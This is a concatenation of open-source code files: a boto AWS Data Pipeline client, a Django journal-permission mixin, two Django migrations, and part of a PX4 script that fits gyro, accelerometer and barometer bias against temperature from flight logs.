:param version: The version of the pipeline definition to retrieve.
This parameter accepts the values `latest` (default) and `active`.
Where `latest` indicates the last definition saved to the pipeline
and `active` indicates the last definition of the pipeline that was
activated.
"""
params = {'pipelineId': pipeline_id, }
if version is not None:
params['version'] = version
return self.make_request(action='GetPipelineDefinition',
body=json.dumps(params))
def list_pipelines(self, marker=None):
"""
Returns a list of pipeline identifiers for all active
pipelines. Identifiers are returned only for pipelines you
have permission to access.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call ListPipelines, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
ListPipelines again and pass the marker value from the response to
retrieve the next set of results.
"""
params = {}
if marker is not None:
params['marker'] = marker
return self.make_request(action='ListPipelines',
body=json.dumps(params))
def poll_for_task(self, worker_group, hostname=None,
instance_identity=None):
"""
Task runners call this action to receive a task to perform
from AWS Data Pipeline. The task runner specifies which tasks
it can perform by setting a value for the workerGroup
parameter of the PollForTask call. The task returned by
PollForTask may come from any of the pipelines that match the
workerGroup value passed in by the task runner and that was
launched using the IAM user credentials specified by the task
runner.
If tasks are ready in the work queue, PollForTask returns a
response immediately. If no tasks are available in the queue,
PollForTask uses long-polling and holds on to a poll
connection for up to 90 seconds during which time the first
newly scheduled task is handed to the task runner. To
accommodate this, set the socket timeout in your task runner to
90 seconds. The task runner should not call PollForTask again
on the same `workerGroup` until it receives a response, and
this may take up to 90 seconds.
:type worker_group: string
:param worker_group: Indicates the type of task the task runner is
configured to accept and process. The worker group is set as a
field on objects in the pipeline when they are created. You can
only specify a single value for `workerGroup` in the call to
PollForTask. There are no wildcard values permitted in
`workerGroup`, the string must be an exact, case-sensitive, match.
:type hostname: string
:param hostname: The public DNS name of the calling task runner.
:type instance_identity: dict
:param instance_identity: Identity information for the Amazon EC2
instance that is hosting the task runner. You can get this value by
calling the URI, `http://169.254.169.254/latest/meta-data/instance-
id`, from the EC2 instance. For more information, go to `Instance
Metadata`_ in the Amazon Elastic Compute Cloud User Guide. Passing
in this value proves that your task runner is running on an EC2
instance, and ensures the proper AWS Data Pipeline service charges
are applied to your pipeline.
"""
params = {'workerGroup': worker_group, }
if hostname is not None:
params['hostname'] = hostname
if instance_identity is not None:
params['instanceIdentity'] = instance_identity
return self.make_request(action='PollForTask',
body=json.dumps(params))
def put_pipeline_definition(self, pipeline_objects, pipeline_id):
"""
Adds tasks, schedules, and preconditions that control the
behavior of the pipeline. You can use PutPipelineDefinition to
populate a new pipeline or to update an existing pipeline that
has not yet been activated.
PutPipelineDefinition also validates the configuration as it
adds it to the pipeline. Changes to the pipeline are saved
unless one of the following three validation errors exists in
the pipeline.
#. An object is missing a name or identifier field.
#. A string or reference field is empty.
#. The number of objects in the pipeline exceeds the maximum
allowed objects.
Pipeline object definitions are passed to the
PutPipelineDefinition action and returned by the
GetPipelineDefinition action.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to be configured.
:type pipeline_objects: list
:param pipeline_objects: The objects that define the pipeline. These
will overwrite the existing pipeline definition.
"""
params = {
'pipelineId': pipeline_id,
'pipelineObjects': pipeline_objects,
}
return self.make_request(action='PutPipelineDefinition',
body=json.dumps(params))
def query_objects(self, pipeline_id, sphere, marker=None, query=None,
limit=None):
"""
Queries a pipeline for the names of objects that match a
specified set of conditions.
The objects returned by QueryObjects are paginated and then
filtered by the value you set for query. This means the action
may return an empty result set with a value set for marker. If
`HasMoreResults` is set to `True`, you should continue to call
QueryObjects, passing in the returned value for marker, until
`HasMoreResults` returns `False`.
:type pipeline_id: string
:param pipeline_id: Identifier of the pipeline to be queried for object
names.
:type query: dict
:param query: Query that defines the objects to be returned. The Query
object can contain a maximum of ten selectors. The conditions in
the query are limited to top-level String fields in the object.
These filters can be applied to components, instances, and
attempts.
:type sphere: string
:param sphere: Specifies whether the query applies to components or
instances. Allowable values: `COMPONENT`, `INSTANCE`, `ATTEMPT`.
:type marker: string
:param marker: The starting point for the results to be returned. The
first time you call QueryObjects, this value should be empty. As
long as the action returns `HasMoreResults` as `True`, you can call
QueryObjects again and pass the marker value from the response to
retrieve the next set of results.
:type limit: integer
:param limit: Specifies the maximum number of object names that
QueryObjects will return in a single call. The default value is
100.
"""
params = {'pipelineId': pipeline_id, 'sphere': sphere, }
if query is not None:
params['query'] = query
if marker is not None:
params['marker'] = marker
if limit is not None:
params['limit'] = limit
return self.make_request(action='QueryObjects',
body=json.dumps(params))
def report_task_progress(self, task_id):
"""
Updates the AWS Data Pipeline service on the progress of the
calling task runner. When the task runner is assigned a task,
it should call ReportTaskProgress to acknowledge that it has
the task within 2 minutes. If the web service does not receive
this acknowledgement within the 2 minute window, it will
assign the task in a subsequent PollForTask call. After this
initial acknowledgement, the task runner only needs to report
progress every 15 minutes to maintain its ownership of the
task. You can change this reporting time from 15 minutes by
specifying a `reportProgressTimeout` field in your pipeline.
If a task runner does not report its status after 5 minutes,
AWS Data Pipeline will assume that the task runner is unable
to process the task and will reassign the task in a subsequent
response to PollForTask. Task runners should call
ReportTaskProgress every 60 seconds.
:type task_id: string
:param task_id: Identifier of the task assigned to the task runner.
This value is provided in the TaskObject that the service returns
with the response for the PollForTask action.
"""
params = {'taskId': task_id, }
return self.make_request(action='ReportTaskProgress',
body=json.dumps(params))
def report_task_runner_heartbeat(self, taskrunner_id, worker_group=None,
hostname=None):
"""
Task runners call ReportTaskRunnerHeartbeat every 15 minutes
to indicate that they are operational. In the case of AWS Data
Pipeline Task Runner launched on a resource managed by AWS
Data Pipeline, the web service can use this call to detect
when the task runner application has failed and restart a new
instance.
:type taskrunner_id: string
:param taskrunner_id: The identifier of the task runner. This value
should be unique across your AWS account. In the case of AWS Data
Pipeline Task Runner launched on a resource managed by AWS Data
Pipeline, the web service provides a unique identifier when it
launches the application. If you have written a custom task runner,
you should assign a unique identifier for the task runner.
:type worker_group: string
:param worker_group: Indicates the type of task the task runner is
configured to accept and process. The worker group is set as a
field on objects in the pipeline when they are created. You can
only specify a single value for `workerGroup` in the call to
ReportTaskRunnerHeartbeat. There are no wildcard values permitted
in `workerGroup`, the string must be an exact, case-sensitive,
match.
:type hostname: string
:param hostname: The public DNS name of the calling task runner.
"""
params = {'taskrunnerId': taskrunner_id, }
if worker_group is not None:
params['workerGroup'] = worker_group
if hostname is not None:
params['hostname'] = hostname
return self.make_request(action='ReportTaskRunnerHeartbeat',
body=json.dumps(params))
def set_status(self, object_ids, status, pipeline_id):
"""
Requests that the status of an array of physical or logical
pipeline objects be updated in the pipeline. This update may
not occur immediately, but is eventually consistent. The
status that can be set depends on the type of object.
:type pipeline_id: string
:param pipeline_id: Identifies the pipeline that contains the objects.
:type object_ids: list
:param object_ids: Identifies an array of objects. The corresponding
objects can be either physical or components, but not a mix of both
types.
:type status: string
:param status: Specifies the status to be set on all the objects in
`objectIds`. For components, this can be either `PAUSE` or
`RESUME`. For instances, this can be either `CANCEL`, `RERUN`, or
`MARK_FINISHED`.
"""
params = {
'pipelineId': pipeline_id,
'objectIds': object_ids,
'status': status,
}
return self.make_request(action='SetStatus',
body=json.dumps(params))
def set_task_status(self, task_id, task_status, error_id=None,
error_message=None, error_stack_trace=None):
"""
Notifies AWS Data Pipeline that a task is completed and
provides information about the final status. The task runner
calls this action regardless of whether the task was
successful. The task runner does not need to call SetTaskStatus
for tasks that are canceled by the web service during a call
to ReportTaskProgress.
:type task_id: string
:param task_id: Identifies the task assigned to the task runner. This
value is set in the TaskObject that is returned by the PollForTask
action.
:type task_status: string
:param task_status: If `FINISHED`, the task successfully completed. If
`FAILED` the task ended unsuccessfully. The `FALSE` value is used
by preconditions.
:type error_id: string
:param error_id: If an error occurred during the task, this value
specifies an id value that represents the error. This value is set
on the physical attempt object. It is used to display error
information to the user. It should not start with string "Service_"
which is reserved by the system.
:type error_message: string
:param error_message: If an error occurred during the task, this value
specifies a text description of the error. This value is set on the
physical attempt object. It is used to display error information to
the user. The web service does not parse this value.
:type error_stack_trace: string
:param error_stack_trace: If an error occurred during the task, this
value specifies the stack trace associated with the error. This
value is set on the physical attempt object. It is used to display
error information to the user. The web service does not parse this
value.
"""
params = {'taskId': task_id, 'taskStatus': task_status, }
if error_id is not None:
params['errorId'] = error_id
if error_message is not None:
params['errorMessage'] = error_message
if error_stack_trace is not None:
params['errorStackTrace'] = error_stack_trace
return self.make_request(action='SetTaskStatus',
body=json.dumps(params))
def validate_pipeline_definition(self, pipeline_objects, pipeline_id):
"""
Tests the pipeline definition with a set of validation checks
to ensure that it is well formed and can run without error.
:type pipeline_id: string
:param pipeline_id: Identifies the pipeline whose definition is to be
validated.
:type pipeline_objects: list
:param pipeline_objects: A list of objects that define the pipeline
changes to validate against the pipeline.
"""
params = {
'pipelineId': pipeline_id,
'pipelineObjects': pipeline_objects,
}
return self.make_request(action='ValidatePipelineDefinition',
body=json.dumps(params))
def make_request(self, action, body):
headers = {
'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
'Host': self.region.endpoint,
'Content-Type': 'application/x-amz-json-1.1',
'Content-Length': str(len(body)),
}
http_request = self.build_base_http_request(
method='POST', path='/', auth_path='/', params={},
headers=headers, data=body)
response = self._mexe(http_request, sender=None,
override_num_retries=10)
response_body = response.read().decode('utf-8')
boto.log.debug(response_body)
if response.status == 200:
if response_body:
return json.loads(response_body)
else:
json_body = json.loads(response_body)
fault_name = json_body.get('__type', None)
exception_class = self._faults.get(fault_name, self.ResponseError)
raise exception_class(response.status, response.reason,
body=json_body)
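# Illustrative usage sketch (hypothetical identifiers, not part of boto):
# credentials are picked up from the environment or boto config as usual.
#
#   conn = DataPipelineConnection()
#   created = conn.create_pipeline('my-pipeline', 'my-unique-token')
#   pipeline_id = created['pipelineId']
#   # pipeline_objects would be a user-supplied list of object definitions
#   conn.put_pipeline_definition(pipeline_objects, pipeline_id)
#   conn.activate_pipeline(pipeline_id)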
| gpl-3.0 |
erudit/zenon | eruditorg/apps/userspace/journal/viewmixins.py | 1 | 4026 | # -*- coding: utf-8 -*-
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils.functional import cached_property
from django.contrib.auth.mixins import LoginRequiredMixin
from rules.contrib.views import PermissionRequiredMixin
from core.journal.rules_helpers import get_editable_journals
from erudit.models import Journal
class JournalScopeMixin:
"""
The JournalScopeMixin provides a way to associate a view with a specific Journal instance. The
Journal instance must have the current user among its members; otherwise a PermissionDenied error
is raised.
"""
force_scope_switch_to_pattern_name = None
scope_session_key = 'userspace:journal-management:current-journal-id'
def dispatch(self, request, *args, **kwargs):
self.request = request
response = self.init_scope()
return response if response \
else super(JournalScopeMixin, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(JournalScopeMixin, self).get_context_data(**kwargs)
context['scope_current_journal'] = self.current_journal
context['scope_user_journals'] = self.user_journals
context['force_scope_switch_to_pattern_name'] = self.force_scope_switch_to_pattern_name
return context
def get_user_journals(self):
""" Returns the journals that can be accessed by the current user. """
return get_editable_journals(self.request.user)
def init_current_journal(self, journal):
""" Associates the current journal to the view and saves its ID into the session. """
self.current_journal = journal
self.request.session[self.scope_session_key] = journal.id
def init_scope(self):
""" Initializes the Journal scope. """
scoped_url = self.kwargs.get('journal_pk') is not None
# We try to determine the current Journal instance by looking
# first in the URL. If the journal ID cannot be retrieved from there
# we try to fetch it from the session.
current_journal_id = self.kwargs.get('journal_pk', None) \
or self.request.session.get(self.scope_session_key, None)
journal = None
if current_journal_id is not None:
journal = get_object_or_404(Journal, id=current_journal_id)
else:
user_journals_qs = self.user_journals
user_journal_count = user_journals_qs.count()
if user_journal_count:
journal = user_journals_qs.first()
# Returns a 403 error if the user is not a member of the journal
if journal is None or not self.user_journals.filter(id=journal.id).exists():
raise PermissionDenied
if not scoped_url:
# Redirects to the scoped URL
resolver_match = self.request.resolver_match
args = resolver_match.args
kwargs = resolver_match.kwargs.copy()
kwargs.update({'journal_pk': journal.pk})
url = reverse(
':'.join([resolver_match.namespace, resolver_match.url_name]),
args=args, kwargs=kwargs)
if self.request.GET:
url = '{}?{}'.format(url, self.request.GET.urlencode())
return HttpResponseRedirect(url)
self.init_current_journal(journal)
@cached_property
def user_journals(self):
return self.get_user_journals()
class JournalScopePermissionRequiredMixin(
LoginRequiredMixin, JournalScopeMixin, PermissionRequiredMixin):
raise_exception = True
def get_context_data(self, **kwargs):
context = super(JournalScopePermissionRequiredMixin, self).get_context_data(**kwargs)
context['journal_permission_required'] = self.permission_required
return context
def get_permission_object(self):
return self.current_journal
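# Illustrative usage sketch (hypothetical names, not part of this app): a
# journal-scoped view combines the mixin with a generic view and declares the
# permission that is checked against the current journal.
#
#   from django.views.generic import TemplateView
#
#   class JournalHomeView(JournalScopePermissionRequiredMixin, TemplateView):
#       template_name = 'userspace/journal/home.html'
#       permission_required = 'userspace.manage_journal'  # hypothetical name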
| gpl-3.0 |
lamby/buildinfo.debian.net | bidb/buildinfo/buildinfo_submissions/migrations/0001_initial.py | 1 | 1336 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-22 13:37
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
import django.utils.crypto
import functools
class Migration(migrations.Migration):
initial = True
dependencies = [
('buildinfo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Submission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.CharField(default=functools.partial(django.utils.crypto.get_random_string, *(8, b'3479abcdefghijkmnopqrstuvwxyz'), **{}), max_length=8, unique=True)),
('uid', models.CharField(max_length=512)),
('node', models.CharField(max_length=512)),
('raw_text', models.TextField()),
('created', models.DateTimeField(default=datetime.datetime.utcnow)),
('buildinfo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='submissions', to='buildinfo.Buildinfo')),
],
options={
'ordering': ('created',),
'get_latest_by': 'created',
},
),
]
| agpl-3.0 |
achow101/forkmon | monitor/migrations/0005_auto_20170718_2122.py | 1 | 1037 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-19 04:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('monitor', '0004_auto_20170718_0105'),
]
operations = [
migrations.CreateModel(
name='BIP9Fork',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('state', models.CharField(max_length=100)),
('count', models.IntegerField()),
('elapsed', models.IntegerField()),
('period', models.IntegerField()),
('threshold', models.IntegerField()),
],
),
migrations.AddField(
model_name='node',
name='stats_node',
field=models.BooleanField(default=False),
),
]
| mit |
jlecoeur/Firmware | Tools/process_sensor_caldata.py | 2 | 31623 | #! /usr/bin/env python
from __future__ import print_function
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
from pyulog import *
"""
Reads in IMU data from a static thermal calibration test and performs a curve fit of gyro, accel and baro bias vs temperature
Data can be gathered using the following sequence:
1) Power up the board and set the TC_A_ENABLE, TC_B_ENABLE and TC_G_ENABLE parameters to 1
2) Set all CAL_GYR and CAL_ACC parameters to defaults
3) Set the SYS_LOGGER parameter to 1 to use the new system logger
4) Set the SDLOG_MODE parameter to 2, and SDLOG_PROFILE parameter to 4 to enable logging of sensor data for calibration and power off
5) Cold soak the board for 30 minutes
6) Move to a warm dry, still air, constant pressure environment.
7) Apply power for 45 minutes, keeping the board still.
8) Remove power and extract the .ulog file
9) Open a terminal window in the Firmware/Tools directory and run the python calibration script: 'python process_sensor_caldata.py <full path name to .ulog file>'
10) Power the board, connect QGC and load the parameter from the generated .params file onto the board using QGC. Due to the number of parameters, loading them may take some time.
11) TODO - we need a way for the user to reliably tell when parameters have all been changed and saved.
12) After parameters have finished loading, set SDLOG_MODE and SDLOG_PROFILE to their respective values prior to step 4) and remove power.
13) Power the board and perform a normal gyro and accelerometer sensor calibration using QGC. The board must be repowered after this step before flying due to large parameter changes and the thermal compensation parameters only being read on startup.
Outputs thermal compensation parameters in a file named <inputfilename>.params which can be loaded onto the board using QGroundControl
Outputs summary plots in a pdf file named <inputfilename>.pdf
"""
parser = argparse.ArgumentParser(description='Analyse the sensor_gyro message data')
parser.add_argument('filename', metavar='file.ulg', help='ULog input file')
def is_valid_directory(parser, arg):
if os.path.isdir(arg):
# Directory exists so return the directory
return arg
else:
parser.error('The directory {} does not exist'.format(arg))
args = parser.parse_args()
ulog_file_name = args.filename
ulog = ULog(ulog_file_name, None)
data = ulog.data_list
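# Note: each entry of ULog.data_list is a pyulog data object whose 'name' is
# the uORB message name (e.g. 'sensor_gyro') and whose 'data' attribute is a
# dict mapping field names to numpy arrays; instances of the same message are
# matched below by their order of appearance in the log.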
# extract gyro data
sensor_instance = 0
num_gyros = 0
for d in data:
if d.name == 'sensor_gyro':
if sensor_instance == 0:
sensor_gyro_0 = d.data
print('found gyro 0 data')
num_gyros = 1
if sensor_instance == 1:
sensor_gyro_1 = d.data
print('found gyro 1 data')
num_gyros = 2
if sensor_instance == 2:
sensor_gyro_2 = d.data
print('found gyro 2 data')
num_gyros = 3
sensor_instance = sensor_instance +1
# extract accel data
sensor_instance = 0
num_accels = 0
for d in data:
if d.name == 'sensor_accel':
if sensor_instance == 0:
sensor_accel_0 = d.data
print('found accel 0 data')
num_accels = 1
if sensor_instance == 1:
sensor_accel_1 = d.data
print('found accel 1 data')
num_accels = 2
if sensor_instance == 2:
sensor_accel_2 = d.data
print('found accel 2 data')
num_accels = 3
sensor_instance = sensor_instance +1
# extract baro data
sensor_instance = 0
num_baros = 0
for d in data:
if d.name == 'sensor_baro':
if sensor_instance == 0:
sensor_baro_0 = d.data
print('found baro 0 data')
num_baros = 1
if sensor_instance == 1:
sensor_baro_1 = d.data
print('found baro 1 data')
num_baros = 2
sensor_instance = sensor_instance +1
# open file to save plots to PDF
from matplotlib.backends.backend_pdf import PdfPages
output_plot_filename = ulog_file_name + ".pdf"
pp = PdfPages(output_plot_filename)
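# Each pp.savefig() call below appends the currently active matplotlib figure
# as a new page of this PDF; the file is finalized when the PdfPages object is
# closed.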
#################################################################################
# define data dictionary of gyro 0 thermal correction parameters
gyro_0_params = {
'TC_G0_ID':0,
'TC_G0_TMIN':0.0,
'TC_G0_TMAX':0.0,
'TC_G0_TREF':0.0,
'TC_G0_X0_0':0.0,
'TC_G0_X1_0':0.0,
'TC_G0_X2_0':0.0,
'TC_G0_X3_0':0.0,
'TC_G0_X0_1':0.0,
'TC_G0_X1_1':0.0,
'TC_G0_X2_1':0.0,
'TC_G0_X3_1':0.0,
'TC_G0_X0_2':0.0,
'TC_G0_X1_2':0.0,
'TC_G0_X2_2':0.0,
'TC_G0_X3_2':0.0,
'TC_G0_SCL_0':1.0,
'TC_G0_SCL_1':1.0,
'TC_G0_SCL_2':1.0
}
# curve fit the data for gyro 0 corrections
if num_gyros >= 1:
gyro_0_params['TC_G0_ID'] = int(np.median(sensor_gyro_0['device_id']))
# find the min, max and reference temperature
gyro_0_params['TC_G0_TMIN'] = np.amin(sensor_gyro_0['temperature'])
gyro_0_params['TC_G0_TMAX'] = np.amax(sensor_gyro_0['temperature'])
gyro_0_params['TC_G0_TREF'] = 0.5 * (gyro_0_params['TC_G0_TMIN'] + gyro_0_params['TC_G0_TMAX'])
temp_rel = sensor_gyro_0['temperature'] - gyro_0_params['TC_G0_TREF']
temp_rel_resample = np.linspace(gyro_0_params['TC_G0_TMIN']-gyro_0_params['TC_G0_TREF'], gyro_0_params['TC_G0_TMAX']-gyro_0_params['TC_G0_TREF'], 100)
temp_resample = temp_rel_resample + gyro_0_params['TC_G0_TREF']
# fit X axis
coef_gyro_0_x = np.polyfit(temp_rel,sensor_gyro_0['x'],3)
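# np.polyfit returns coefficients ordered from the highest power down, so
# index 0 is the cubic term (mapped to TC_*_X3_*) and index 3 is the constant
# offset (mapped to TC_*_X0_*); the same mapping repeats for every axis and
# sensor instance below.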
gyro_0_params['TC_G0_X3_0'] = coef_gyro_0_x[0]
gyro_0_params['TC_G0_X2_0'] = coef_gyro_0_x[1]
gyro_0_params['TC_G0_X1_0'] = coef_gyro_0_x[2]
gyro_0_params['TC_G0_X0_0'] = coef_gyro_0_x[3]
fit_coef_gyro_0_x = np.poly1d(coef_gyro_0_x)
gyro_0_x_resample = fit_coef_gyro_0_x(temp_rel_resample)
# fit Y axis
coef_gyro_0_y = np.polyfit(temp_rel,sensor_gyro_0['y'],3)
gyro_0_params['TC_G0_X3_1'] = coef_gyro_0_y[0]
gyro_0_params['TC_G0_X2_1'] = coef_gyro_0_y[1]
gyro_0_params['TC_G0_X1_1'] = coef_gyro_0_y[2]
gyro_0_params['TC_G0_X0_1'] = coef_gyro_0_y[3]
fit_coef_gyro_0_y = np.poly1d(coef_gyro_0_y)
gyro_0_y_resample = fit_coef_gyro_0_y(temp_rel_resample)
# fit Z axis
coef_gyro_0_z = np.polyfit(temp_rel,sensor_gyro_0['z'],3)
gyro_0_params['TC_G0_X3_2'] = coef_gyro_0_z[0]
gyro_0_params['TC_G0_X2_2'] = coef_gyro_0_z[1]
gyro_0_params['TC_G0_X1_2'] = coef_gyro_0_z[2]
gyro_0_params['TC_G0_X0_2'] = coef_gyro_0_z[3]
fit_coef_gyro_0_z = np.poly1d(coef_gyro_0_z)
gyro_0_z_resample = fit_coef_gyro_0_z(temp_rel_resample)
# gyro0 vs temperature
plt.figure(1,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['x'],'b')
plt.plot(temp_resample,gyro_0_x_resample,'r')
plt.title('Gyro 0 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['y'],'b')
plt.plot(temp_resample,gyro_0_y_resample,'r')
plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_0['temperature'],sensor_gyro_0['z'],'b')
plt.plot(temp_resample,gyro_0_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of gyro 1 thermal correction parameters
gyro_1_params = {
'TC_G1_ID':0,
'TC_G1_TMIN':0.0,
'TC_G1_TMAX':0.0,
'TC_G1_TREF':0.0,
'TC_G1_X0_0':0.0,
'TC_G1_X1_0':0.0,
'TC_G1_X2_0':0.0,
'TC_G1_X3_0':0.0,
'TC_G1_X0_1':0.0,
'TC_G1_X1_1':0.0,
'TC_G1_X2_1':0.0,
'TC_G1_X3_1':0.0,
'TC_G1_X0_2':0.0,
'TC_G1_X1_2':0.0,
'TC_G1_X2_2':0.0,
'TC_G1_X3_2':0.0,
'TC_G1_SCL_0':1.0,
'TC_G1_SCL_1':1.0,
'TC_G1_SCL_2':1.0
}
# curve fit the data for gyro 1 corrections
if num_gyros >= 2:
gyro_1_params['TC_G1_ID'] = int(np.median(sensor_gyro_1['device_id']))
# find the min, max and reference temperature
gyro_1_params['TC_G1_TMIN'] = np.amin(sensor_gyro_1['temperature'])
gyro_1_params['TC_G1_TMAX'] = np.amax(sensor_gyro_1['temperature'])
gyro_1_params['TC_G1_TREF'] = 0.5 * (gyro_1_params['TC_G1_TMIN'] + gyro_1_params['TC_G1_TMAX'])
temp_rel = sensor_gyro_1['temperature'] - gyro_1_params['TC_G1_TREF']
temp_rel_resample = np.linspace(gyro_1_params['TC_G1_TMIN']-gyro_1_params['TC_G1_TREF'], gyro_1_params['TC_G1_TMAX']-gyro_1_params['TC_G1_TREF'], 100)
temp_resample = temp_rel_resample + gyro_1_params['TC_G1_TREF']
# fit X axis
coef_gyro_1_x = np.polyfit(temp_rel,sensor_gyro_1['x'],3)
gyro_1_params['TC_G1_X3_0'] = coef_gyro_1_x[0]
gyro_1_params['TC_G1_X2_0'] = coef_gyro_1_x[1]
gyro_1_params['TC_G1_X1_0'] = coef_gyro_1_x[2]
gyro_1_params['TC_G1_X0_0'] = coef_gyro_1_x[3]
fit_coef_gyro_1_x = np.poly1d(coef_gyro_1_x)
gyro_1_x_resample = fit_coef_gyro_1_x(temp_rel_resample)
# fit Y axis
coef_gyro_1_y = np.polyfit(temp_rel,sensor_gyro_1['y'],3)
gyro_1_params['TC_G1_X3_1'] = coef_gyro_1_y[0]
gyro_1_params['TC_G1_X2_1'] = coef_gyro_1_y[1]
gyro_1_params['TC_G1_X1_1'] = coef_gyro_1_y[2]
gyro_1_params['TC_G1_X0_1'] = coef_gyro_1_y[3]
fit_coef_gyro_1_y = np.poly1d(coef_gyro_1_y)
gyro_1_y_resample = fit_coef_gyro_1_y(temp_rel_resample)
# fit Z axis
coef_gyro_1_z = np.polyfit(temp_rel,sensor_gyro_1['z'],3)
gyro_1_params['TC_G1_X3_2'] = coef_gyro_1_z[0]
gyro_1_params['TC_G1_X2_2'] = coef_gyro_1_z[1]
gyro_1_params['TC_G1_X1_2'] = coef_gyro_1_z[2]
gyro_1_params['TC_G1_X0_2'] = coef_gyro_1_z[3]
fit_coef_gyro_1_z = np.poly1d(coef_gyro_1_z)
gyro_1_z_resample = fit_coef_gyro_1_z(temp_rel_resample)
# gyro1 vs temperature
plt.figure(2,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['x'],'b')
plt.plot(temp_resample,gyro_1_x_resample,'r')
plt.title('Gyro 1 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['y'],'b')
plt.plot(temp_resample,gyro_1_y_resample,'r')
plt.ylabel('Y bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,3)
plt.plot(sensor_gyro_1['temperature'],sensor_gyro_1['z'],'b')
plt.plot(temp_resample,gyro_1_z_resample,'r')
plt.ylabel('Z bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
pp.savefig()
#################################################################################
#################################################################################
# define data dictionary of gyro 2 thermal correction parameters
gyro_2_params = {
'TC_G2_ID':0,
'TC_G2_TMIN':0.0,
'TC_G2_TMAX':0.0,
'TC_G2_TREF':0.0,
'TC_G2_X0_0':0.0,
'TC_G2_X1_0':0.0,
'TC_G2_X2_0':0.0,
'TC_G2_X3_0':0.0,
'TC_G2_X0_1':0.0,
'TC_G2_X1_1':0.0,
'TC_G2_X2_1':0.0,
'TC_G2_X3_1':0.0,
'TC_G2_X0_2':0.0,
'TC_G2_X1_2':0.0,
'TC_G2_X2_2':0.0,
'TC_G2_X3_2':0.0,
'TC_G2_SCL_0':1.0,
'TC_G2_SCL_1':1.0,
'TC_G2_SCL_2':1.0
}
# curve fit the data for gyro 2 corrections
if num_gyros >= 3:
gyro_2_params['TC_G2_ID'] = int(np.median(sensor_gyro_2['device_id']))
# find the min, max and reference temperature
gyro_2_params['TC_G2_TMIN'] = np.amin(sensor_gyro_2['temperature'])
gyro_2_params['TC_G2_TMAX'] = np.amax(sensor_gyro_2['temperature'])
gyro_2_params['TC_G2_TREF'] = 0.5 * (gyro_2_params['TC_G2_TMIN'] + gyro_2_params['TC_G2_TMAX'])
temp_rel = sensor_gyro_2['temperature'] - gyro_2_params['TC_G2_TREF']
temp_rel_resample = np.linspace(gyro_2_params['TC_G2_TMIN']-gyro_2_params['TC_G2_TREF'], gyro_2_params['TC_G2_TMAX']-gyro_2_params['TC_G2_TREF'], 100)
temp_resample = temp_rel_resample + gyro_2_params['TC_G2_TREF']
# fit X axis
coef_gyro_2_x = np.polyfit(temp_rel,sensor_gyro_2['x'],3)
gyro_2_params['TC_G2_X3_0'] = coef_gyro_2_x[0]
gyro_2_params['TC_G2_X2_0'] = coef_gyro_2_x[1]
gyro_2_params['TC_G2_X1_0'] = coef_gyro_2_x[2]
gyro_2_params['TC_G2_X0_0'] = coef_gyro_2_x[3]
fit_coef_gyro_2_x = np.poly1d(coef_gyro_2_x)
gyro_2_x_resample = fit_coef_gyro_2_x(temp_rel_resample)
# fit Y axis
coef_gyro_2_y = np.polyfit(temp_rel,sensor_gyro_2['y'],3)
gyro_2_params['TC_G2_X3_1'] = coef_gyro_2_y[0]
gyro_2_params['TC_G2_X2_1'] = coef_gyro_2_y[1]
gyro_2_params['TC_G2_X1_1'] = coef_gyro_2_y[2]
gyro_2_params['TC_G2_X0_1'] = coef_gyro_2_y[3]
fit_coef_gyro_2_y = np.poly1d(coef_gyro_2_y)
gyro_2_y_resample = fit_coef_gyro_2_y(temp_rel_resample)
# fit Z axis
coef_gyro_2_z = np.polyfit(temp_rel,sensor_gyro_2['z'],3)
gyro_2_params['TC_G2_X3_2'] = coef_gyro_2_z[0]
gyro_2_params['TC_G2_X2_2'] = coef_gyro_2_z[1]
gyro_2_params['TC_G2_X1_2'] = coef_gyro_2_z[2]
gyro_2_params['TC_G2_X0_2'] = coef_gyro_2_z[3]
fit_coef_gyro_2_z = np.poly1d(coef_gyro_2_z)
gyro_2_z_resample = fit_coef_gyro_2_z(temp_rel_resample)
# gyro2 vs temperature
plt.figure(3,figsize=(20,13))
# draw plots
plt.subplot(3,1,1)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['x'],'b')
plt.plot(temp_resample,gyro_2_x_resample,'r')
plt.title('Gyro 2 Bias vs Temperature')
plt.ylabel('X bias (rad/s)')
plt.xlabel('temperature (degC)')
plt.grid()
# draw plots
plt.subplot(3,1,2)
plt.plot(sensor_gyro_2['temperature'],sensor_gyro_2['y'],'b')
plt.plot(temp_resample,gyro_2_y_resample,'r')
